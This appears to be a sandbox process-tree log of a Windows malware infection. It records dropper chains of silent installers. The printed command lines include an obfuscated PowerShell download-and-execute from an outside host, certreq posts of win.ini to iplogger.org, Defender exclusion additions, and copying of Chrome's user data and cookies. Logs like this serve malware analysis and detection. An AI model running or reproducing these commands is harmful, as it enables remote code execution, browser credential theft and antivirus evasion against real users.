C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"9⤵PID:9492
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4dkasqolfqn\safebits.exe"C:\Users\Admin\AppData\Local\Temp\4dkasqolfqn\safebits.exe" /S /pubid=1 /subid=4515⤵
- Executes dropped EXE
PID:708 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\DragonFruitSoftware\tmorgm.dll",tmorgm C:\Users\Admin\AppData\Local\Temp\4dkasqolfqn\safebits.exe6⤵PID:7936
-
-
-
C:\Users\Admin\AppData\Local\Temp\jyxaueaklov\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\jyxaueaklov\Setup3310.exe" /Verysilent /subid=5775⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Users\Admin\AppData\Local\Temp\is-LNP8P.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-LNP8P.tmp\Setup3310.tmp" /SL5="$1024C,802346,56832,C:\Users\Admin\AppData\Local\Temp\jyxaueaklov\Setup3310.exe" /Verysilent /subid=5776⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4136
-
-
-
C:\Users\Admin\AppData\Local\Temp\todb33dh31g\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\todb33dh31g\askinstall24.exe"5⤵
- Executes dropped EXE
PID:2152 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:5656
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:6032
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\hgwpwdvcypn\app.exe"C:\Users\Admin\AppData\Local\Temp\hgwpwdvcypn\app.exe" /8-235⤵PID:4784
-
C:\Program Files (x86)\Divine-Snowflake\7za.exe"C:\Program Files (x86)\Divine-Snowflake\7za.exe" e -p154.61.71.51 winamp-plugins.7z6⤵PID:4824
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Divine-Snowflake\app.exe" -map "C:\Program Files (x86)\Divine-Snowflake\WinmonProcessMonitor.sys""6⤵PID:4140
-
C:\Program Files (x86)\Divine-Snowflake\app.exe"C:\Program Files (x86)\Divine-Snowflake\app.exe" -map "C:\Program Files (x86)\Divine-Snowflake\WinmonProcessMonitor.sys"7⤵PID:368
-
-
-
C:\Program Files (x86)\Divine-Snowflake\7za.exe"C:\Program Files (x86)\Divine-Snowflake\7za.exe" e -p154.61.71.51 winamp.7z6⤵PID:4596
-
-
C:\Program Files (x86)\Divine-Snowflake\app.exe"C:\Program Files (x86)\Divine-Snowflake\app.exe" /8-236⤵PID:2084
-
-
-
C:\Users\Admin\AppData\Local\Temp\q4oeehydhdi\vpn.exe"C:\Users\Admin\AppData\Local\Temp\q4oeehydhdi\vpn.exe" /silent /subid=4825⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1036
-
-
C:\Users\Admin\AppData\Local\Temp\vy2pekqus0p\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\vy2pekqus0p\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3872
-
-
C:\Users\Admin\AppData\Local\Temp\4iz1gdqs2nv\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\4iz1gdqs2nv\chashepro3.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1656
-
-
C:\Users\Admin\AppData\Local\Temp\eththqbdvsr\vt4qf24ji2h.exe"C:\Users\Admin\AppData\Local\Temp\eththqbdvsr\vt4qf24ji2h.exe" testparams5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3008
-
-
C:\Users\Admin\AppData\Local\Temp\gd04pfzznwr\vwkcydrale0.exe"C:\Users\Admin\AppData\Local\Temp\gd04pfzznwr\vwkcydrale0.exe" 57a764d042bf85⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1512
-
-
C:\Users\Admin\AppData\Local\Temp\g2cphhpasak\u4hmzydyqpk.exe"C:\Users\Admin\AppData\Local\Temp\g2cphhpasak\u4hmzydyqpk.exe" /ustwo INSTALL5⤵
- Executes dropped EXE
PID:220 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 220 -s 6566⤵
- Program crash
PID:5672
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 220 -s 6766⤵
- Program crash
PID:5880
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 220 -s 7126⤵
- Program crash
PID:6108
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 220 -s 8126⤵
- Program crash
PID:5388
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 220 -s 8766⤵
- Program crash
PID:5456
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 220 -s 9326⤵
- Program crash
PID:4272
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 220 -s 10886⤵
- Program crash
PID:4616
-
-
-
C:\Users\Admin\AppData\Local\Temp\zcr5kiudwbu\vict.exe"C:\Users\Admin\AppData\Local\Temp\zcr5kiudwbu\vict.exe" /VERYSILENT /id=5355⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1180
-
-
C:\Users\Admin\AppData\Local\Temp\m45riv25tif\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\m45riv25tif\chashepro3.exe" /VERYSILENT5⤵PID:5288
-
C:\Users\Admin\AppData\Local\Temp\is-GFGV4.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-GFGV4.tmp\chashepro3.tmp" /SL5="$60546,2015144,58368,C:\Users\Admin\AppData\Local\Temp\m45riv25tif\chashepro3.exe" /VERYSILENT6⤵PID:7332
-
-
-
C:\Users\Admin\AppData\Local\Temp\nl34o5z1r0g\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\nl34o5z1r0g\askinstall24.exe"5⤵PID:4488
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:7848
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:6700
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y6⤵PID:8284
-
-
-
C:\Users\Admin\AppData\Local\Temp\pugtfwdlrjr\vict.exe"C:\Users\Admin\AppData\Local\Temp\pugtfwdlrjr\vict.exe" /VERYSILENT /id=5355⤵PID:10464
-
C:\Users\Admin\AppData\Local\Temp\is-TQT1B.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-TQT1B.tmp\vict.tmp" /SL5="$6055A,870426,780800,C:\Users\Admin\AppData\Local\Temp\pugtfwdlrjr\vict.exe" /VERYSILENT /id=5356⤵PID:6252
-
C:\Users\Admin\AppData\Local\Temp\is-FRFEG.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-FRFEG.tmp\wimapi.exe" 5357⤵PID:2120
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\m5nu4q0cfeu\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\m5nu4q0cfeu\Setup3310.exe" /Verysilent /subid=5775⤵PID:7016
-
C:\Users\Admin\AppData\Local\Temp\is-AK3TT.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-AK3TT.tmp\Setup3310.tmp" /SL5="$60548,802346,56832,C:\Users\Admin\AppData\Local\Temp\m5nu4q0cfeu\Setup3310.exe" /Verysilent /subid=5776⤵PID:8440
-
C:\Users\Admin\AppData\Local\Temp\is-GLVO3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-GLVO3.tmp\Setup.exe" /Verysilent7⤵PID:8228
-
C:\Users\Admin\AppData\Local\Temp\is-JR55T.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-JR55T.tmp\Setup.tmp" /SL5="$405D6,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-GLVO3.tmp\Setup.exe" /Verysilent8⤵PID:4456
-
C:\Users\Admin\AppData\Local\Temp\is-RROGG.tmp\ProPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-RROGG.tmp\ProPlugin.exe" /Verysilent9⤵PID:6244
-
C:\Users\Admin\AppData\Local\Temp\is-S8MJ9.tmp\ProPlugin.tmp"C:\Users\Admin\AppData\Local\Temp\is-S8MJ9.tmp\ProPlugin.tmp" /SL5="$405EA,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-RROGG.tmp\ProPlugin.exe" /Verysilent10⤵PID:10004
-
C:\Users\Admin\AppData\Local\Temp\is-9ESVU.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-9ESVU.tmp\Setup.exe"11⤵PID:9752
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"12⤵PID:1280
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-RROGG.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-RROGG.tmp\PictureLAb.exe" /Verysilent9⤵PID:10304
-
C:\Users\Admin\AppData\Local\Temp\is-ARSQK.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-ARSQK.tmp\PictureLAb.tmp" /SL5="$C0588,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-RROGG.tmp\PictureLAb.exe" /Verysilent10⤵PID:11132
-
C:\Users\Admin\AppData\Local\Temp\is-B372U.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-B372U.tmp\Setup.exe" /VERYSILENT11⤵PID:7868
-
C:\Users\Admin\AppData\Local\Temp\is-FUML9.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-FUML9.tmp\Setup.tmp" /SL5="$605B6,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-B372U.tmp\Setup.exe" /VERYSILENT12⤵PID:5588
-
C:\Users\Admin\AppData\Local\Temp\is-FR5TI.tmp\kkkk.exe"C:\Users\Admin\AppData\Local\Temp\is-FR5TI.tmp\kkkk.exe" /S /UID=lab21413⤵PID:9416
-
C:\Users\Admin\AppData\Local\Temp\bd-7da37-381-32281-09fccb1469edb\Wahaeladawy.exe"C:\Users\Admin\AppData\Local\Temp\bd-7da37-381-32281-09fccb1469edb\Wahaeladawy.exe"14⤵PID:7104
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v1oxxtsp.jh0\GcleanerWW.exe /mixone & exit15⤵PID:7568
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tizh5fvf.qnu\privacytools5.exe & exit15⤵PID:9620
-
C:\Users\Admin\AppData\Local\Temp\tizh5fvf.qnu\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\tizh5fvf.qnu\privacytools5.exe16⤵PID:9760
-
C:\Users\Admin\AppData\Local\Temp\tizh5fvf.qnu\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\tizh5fvf.qnu\privacytools5.exe17⤵PID:5144
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cnzwycdm.eup\setup.exe /8-2222 & exit15⤵PID:10908
-
C:\Users\Admin\AppData\Local\Temp\cnzwycdm.eup\setup.exeC:\Users\Admin\AppData\Local\Temp\cnzwycdm.eup\setup.exe /8-222216⤵PID:5128
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Bitter-Glade"17⤵PID:8992
-
-
C:\Program Files (x86)\Bitter-Glade\7za.exe"C:\Program Files (x86)\Bitter-Glade\7za.exe" e -p154.61.71.51 winamp-plugins.7z17⤵PID:8544
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Bitter-Glade\setup.exe" -map "C:\Program Files (x86)\Bitter-Glade\WinmonProcessMonitor.sys""17⤵PID:8688
-
C:\Program Files (x86)\Bitter-Glade\setup.exe"C:\Program Files (x86)\Bitter-Glade\setup.exe" -map "C:\Program Files (x86)\Bitter-Glade\WinmonProcessMonitor.sys"18⤵PID:8464
-
-
-
C:\Program Files (x86)\Bitter-Glade\7za.exe"C:\Program Files (x86)\Bitter-Glade\7za.exe" e -p154.61.71.51 winamp.7z17⤵PID:9604
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\diksxwwh.by3\MultitimerFour.exe & exit15⤵PID:10448
-
C:\Users\Admin\AppData\Local\Temp\diksxwwh.by3\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\diksxwwh.by3\MultitimerFour.exe16⤵PID:10756
-
C:\Users\Admin\AppData\Local\Temp\10YD9IYK8W\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\10YD9IYK8W\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10417⤵PID:10680
-
C:\Users\Admin\AppData\Local\Temp\10YD9IYK8W\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\10YD9IYK8W\multitimer.exe" 1 3.1615015116.60432ccc84a52 10418⤵PID:5484
-
C:\Users\Admin\AppData\Local\Temp\10YD9IYK8W\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\10YD9IYK8W\multitimer.exe" 2 3.1615015116.60432ccc84a5219⤵PID:5652
-
C:\Users\Admin\AppData\Local\Temp\3y31xwv0n3i\vict.exe"C:\Users\Admin\AppData\Local\Temp\3y31xwv0n3i\vict.exe" /VERYSILENT /id=53520⤵PID:10196
-
C:\Users\Admin\AppData\Local\Temp\is-TTAM4.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-TTAM4.tmp\vict.tmp" /SL5="$80728,870426,780800,C:\Users\Admin\AppData\Local\Temp\3y31xwv0n3i\vict.exe" /VERYSILENT /id=53521⤵PID:7912
-
C:\Users\Admin\AppData\Local\Temp\is-KUAC9.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-KUAC9.tmp\wimapi.exe" 53522⤵PID:5948
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\of3dxkhuuwr\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\of3dxkhuuwr\chashepro3.exe" /VERYSILENT20⤵PID:2268
-
-
C:\Users\Admin\AppData\Local\Temp\5zwjbfbvhkx\kntokp4xy4d.exe"C:\Users\Admin\AppData\Local\Temp\5zwjbfbvhkx\kntokp4xy4d.exe" /ustwo INSTALL20⤵PID:10932
-
-
C:\Users\Admin\AppData\Local\Temp\c3eokicyy0z\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\c3eokicyy0z\askinstall24.exe"20⤵PID:4624
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe21⤵PID:10564
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe22⤵
- Kills process with taskkill
PID:7232
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y21⤵PID:7676
-
-
-
C:\Users\Admin\AppData\Local\Temp\4izz4yuindz\safebits.exe"C:\Users\Admin\AppData\Local\Temp\4izz4yuindz\safebits.exe" /S /pubid=1 /subid=45120⤵PID:4396
-
-
C:\Users\Admin\AppData\Local\Temp\ksi4fg2ycxs\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ksi4fg2ycxs\Setup3310.exe" /Verysilent /subid=57720⤵PID:10612
-
-
C:\Users\Admin\AppData\Local\Temp\5y4wy02dqry\app.exe"C:\Users\Admin\AppData\Local\Temp\5y4wy02dqry\app.exe" /8-2320⤵PID:11108
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Lingering-Cherry"21⤵PID:6080
-
-
C:\Program Files (x86)\Lingering-Cherry\7za.exe"C:\Program Files (x86)\Lingering-Cherry\7za.exe" e -p154.61.71.51 winamp-plugins.7z21⤵PID:6428
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-RROGG.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-RROGG.tmp\Delta.exe" /Verysilent9⤵PID:9768
-
C:\Users\Admin\AppData\Local\Temp\is-LTN8I.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-LTN8I.tmp\Delta.tmp" /SL5="$E04F6,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-RROGG.tmp\Delta.exe" /Verysilent10⤵PID:11228
-
C:\Users\Admin\AppData\Local\Temp\is-9FK6A.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-9FK6A.tmp\Setup.exe" /VERYSILENT11⤵PID:8332
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-9FK6A.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit12⤵PID:4460
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f13⤵
- Kills process with taskkill
PID:10820
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-RROGG.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-RROGG.tmp\zznote.exe" /Verysilent9⤵PID:8416
-
C:\Users\Admin\AppData\Local\Temp\is-JEJUT.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-JEJUT.tmp\zznote.tmp" /SL5="$60722,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-RROGG.tmp\zznote.exe" /Verysilent10⤵PID:10588
-
C:\Users\Admin\AppData\Local\Temp\is-NMS05.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-NMS05.tmp\jg4_4jaa.exe" /silent11⤵PID:4696
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-RROGG.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-RROGG.tmp\hjjgaa.exe" /Verysilent9⤵PID:7992
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵PID:3592
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵PID:6988
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\hjsj20112hc\safebits.exe"C:\Users\Admin\AppData\Local\Temp\hjsj20112hc\safebits.exe" /S /pubid=1 /subid=4515⤵PID:7408
-
-
C:\Users\Admin\AppData\Local\Temp\zegpigbrutq\app.exe"C:\Users\Admin\AppData\Local\Temp\zegpigbrutq\app.exe" /8-235⤵PID:5776
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Frosty-Waterfall"6⤵PID:3476
-
-
C:\Program Files (x86)\Frosty-Waterfall\7za.exe"C:\Program Files (x86)\Frosty-Waterfall\7za.exe" e -p154.61.71.51 winamp-plugins.7z6⤵PID:8360
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Frosty-Waterfall\app.exe" -map "C:\Program Files (x86)\Frosty-Waterfall\WinmonProcessMonitor.sys""6⤵PID:10840
-
C:\Program Files (x86)\Frosty-Waterfall\app.exe"C:\Program Files (x86)\Frosty-Waterfall\app.exe" -map "C:\Program Files (x86)\Frosty-Waterfall\WinmonProcessMonitor.sys"7⤵PID:6588
-
-
-
C:\Program Files (x86)\Frosty-Waterfall\7za.exe"C:\Program Files (x86)\Frosty-Waterfall\7za.exe" e -p154.61.71.51 winamp.7z6⤵PID:10644
-
-
C:\Program Files (x86)\Frosty-Waterfall\app.exe"C:\Program Files (x86)\Frosty-Waterfall\app.exe" /8-236⤵PID:4256
-
-
-
C:\Users\Admin\AppData\Local\Temp\h4jatpbkhpo\qrmb431hwlg.exe"C:\Users\Admin\AppData\Local\Temp\h4jatpbkhpo\qrmb431hwlg.exe" /ustwo INSTALL5⤵PID:10472
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10472 -s 6566⤵
- Program crash
PID:7972
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10472 -s 6766⤵
- Program crash
PID:10904
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10472 -s 6326⤵
- Program crash
PID:6716
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10472 -s 6966⤵
- Program crash
PID:2196
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10472 -s 8766⤵
- Program crash
PID:6740
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-0A6RA.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-0A6RA.tmp\vpn.tmp" /SL5="$1024E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\q4oeehydhdi\vpn.exe" /silent /subid=4821⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4148 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "2⤵PID:2116
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09013⤵PID:5964
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "2⤵PID:5256
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09013⤵PID:5912
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall2⤵PID:9820
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install2⤵PID:7124
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\21⤵PID:4644
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\22⤵PID:4980
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1EaGq7"1⤵PID:4692
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"1⤵PID:4760
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Divine-Snowflake"1⤵PID:5096
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=970391⤵PID:4156
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo grYNxrw1⤵PID:4720
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\21⤵PID:4832
-
C:\Users\Admin\AppData\Local\Temp\is-NMKDE.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-NMKDE.tmp\{app}\chrome_proxy.exe"1⤵PID:4244
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-NMKDE.tmp\{app}\chrome_proxy.exe"2⤵PID:820
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 43⤵
- Runs ping.exe
PID:5376
-
-
-
C:\Program Files (x86)\JCleaner\8.exe"C:\Program Files (x86)\JCleaner\8.exe"1⤵PID:4812
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Nemica.sys2⤵PID:4632
-
C:\Windows\SysWOW64\cmd.execmd3⤵PID:5516
-
-
-
C:\Users\Admin\AppData\Roaming\c5izi5lskh1\pn2qm0mkqav.exe"C:\Users\Admin\AppData\Roaming\c5izi5lskh1\pn2qm0mkqav.exe" /VERYSILENT /p=testparams1⤵PID:3864
-
C:\Users\Admin\AppData\Local\Temp\is-74TFS.tmp\pn2qm0mkqav.tmp"C:\Users\Admin\AppData\Local\Temp\is-74TFS.tmp\pn2qm0mkqav.tmp" /SL5="$301E6,404973,58368,C:\Users\Admin\AppData\Roaming\c5izi5lskh1\pn2qm0mkqav.exe" /VERYSILENT /p=testparams2⤵PID:4700
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k "C:\Program Files\K246QQERFM\K246QQERF.exe" 57a764d042bf8 & exit1⤵PID:3600
-
C:\Program Files\K246QQERFM\K246QQERF.exe"C:\Program Files\K246QQERFM\K246QQERF.exe" 57a764d042bf82⤵PID:5468
-
-
C:\Users\Admin\AppData\Local\Temp\is-MLTPE.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-MLTPE.tmp\Setup.exe" /Verysilent1⤵PID:4400
-
C:\Users\Admin\AppData\Local\Temp\is-0346P.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-0346P.tmp\Setup.tmp" /SL5="$203E6,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-MLTPE.tmp\Setup.exe" /Verysilent2⤵PID:4636
-
C:\Users\Admin\AppData\Local\Temp\is-VH9MP.tmp\ProPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-VH9MP.tmp\ProPlugin.exe" /Verysilent3⤵PID:5692
-
C:\Users\Admin\AppData\Local\Temp\is-AM84H.tmp\ProPlugin.tmp"C:\Users\Admin\AppData\Local\Temp\is-AM84H.tmp\ProPlugin.tmp" /SL5="$40216,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-VH9MP.tmp\ProPlugin.exe" /Verysilent4⤵PID:5960
-
C:\Users\Admin\AppData\Local\Temp\is-G4QE5.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-G4QE5.tmp\Setup.exe"5⤵PID:5092
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"6⤵PID:4556
-
C:\Windows\regedit.exeregedit /s chrome.reg7⤵
- Runs .reg file with regedit
PID:6024
-
-
C:\Windows\SYSTEM32\TASKKILL.exeTASKKILL /F /IM chrome.exe7⤵
- Kills process with taskkill
PID:5968
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chrome64.bat7⤵PID:4840
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)8⤵PID:5696
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\chrome64.bat" h"9⤵PID:4312
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe"10⤵PID:1728
-
